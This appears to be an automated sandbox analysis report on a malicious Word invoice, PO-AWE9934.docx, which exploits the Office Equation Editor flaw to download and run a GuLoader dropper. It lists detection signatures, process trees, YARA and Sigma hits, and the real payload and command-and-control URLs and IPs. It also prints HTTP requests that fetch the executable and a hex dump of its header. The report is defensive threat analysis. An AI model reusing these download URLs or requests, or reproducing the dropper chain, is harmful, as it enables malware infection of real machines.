Edit tour

Windows Analysis Report
PO-AWE9934.docx

Overview

General Information

Sample Name:	PO-AWE9934.docx
Analysis ID:	562071
MD5:	41d90bec5e345b3f4a7086158e236730
SHA1:	5a179b748a9523ac4cd1b4010f294e5497b5329e
SHA256:	76772145ed4ca48917df45363d450652cba0605b307d85937166c3042ea85609
Tags:	docdocxInvoice
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Contains an external reference to another file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Document has an unknown application name

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Document contains no OLE stream with summary information

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Binary contains a suspicious time stamp

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1124 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3004 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2516 cmdline: "C:\Users\Public\vbc.exe" MD5: 38034F18AF511C3B04B25170735E8B8E)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://www.konutmarket.com/2022file_iz"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3004, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

System Summary

Sigma detected: Droppers Exploiting CVE-2017-11882

Source: Process started

Author: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3004, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2516

Sigma detected: Execution from Suspicious Folder

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.konutmarket.com/2022file_iz"}

Multi AV Scanner detection for submitted file

Source: PO-AWE9934.docx	Virustotal: Detection: 26%			Perma Link
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://107.172.93.32/invoice/dhl_shp.wbk	Avira URL Cloud: Label: malware
Source: http://107.172.93.32/309/vbc.exe	Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Source: global traffic

DNS query: name: onebztip.club

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 66.29.141.207:443

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://www.konutmarket.com/2022file_iz

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View

IP Address: 107.172.93.32 107.172.93.32

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 10:26:23 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27Last-Modified: Fri, 28 Jan 2022 05:43:22 GMTETag: "28938-5d69de9aa38e4"Accept-Ranges: bytesContent-Length: 166200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 66 3e 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 d0 74 02 00 68 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49177 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.93.32

Source: invoice on 107.172.93.32.url.0.dr	String found in binary or memory: http://107.172.93.32/invoice/
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.453547212.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: x.url.0.dr	String found in binary or memory: https://onebztip.club/index.php/x
Source: vbc[1].exe.7.dr, vbc.exe.7.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB971226-827B-47B0-8F41-C98C9532A108}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onebztip.club

Source: global traffic	HTTP traffic detected: GET /index.php/x HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: onebztip.clubConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /invoice/dhl_shp.wbk HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 107.172.93.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /309/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.93.32Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 66.29.141.207:443 -> 192.168.2.22:49167 version: TLS 1.2

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator application name: unknown

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

9_2_0040352D

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040755C	9_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406D85	9_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 9_2_73281BFF	9_2_73281BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699C2E	9_2_03699C2E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699963	9_2_03699963
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699462	9_2_03699462
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03698AD9	9_2_03698AD9

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699C2E NtAllocateVirtualMemory,

9_2_03699C2E

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

OLE indicator has summary info: false

Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: PO-AWE9934.docx	Virustotal: Detection: 26%
Source: PO-AWE9934.docx	ReversingLabs: Detection: 16%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-AWE9934.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@4/26@13/2

Source: C:\Users\Public\vbc.exe

Code function: 9_2_004021AA CoCreateInstance,

9_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_0040498A

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.9.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.9.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.9.dr

Source: ~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000009.00000002.722712672.0000000003690000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 9_2_732830C0 push eax; ret	9_2_732830EE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369594F pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691B54 push FFFFFF81h; ret	9_2_03691B58
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F2D push edx; retf	9_2_03691F51
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03691F27 push 00000027h; iretd	9_2_03691F29
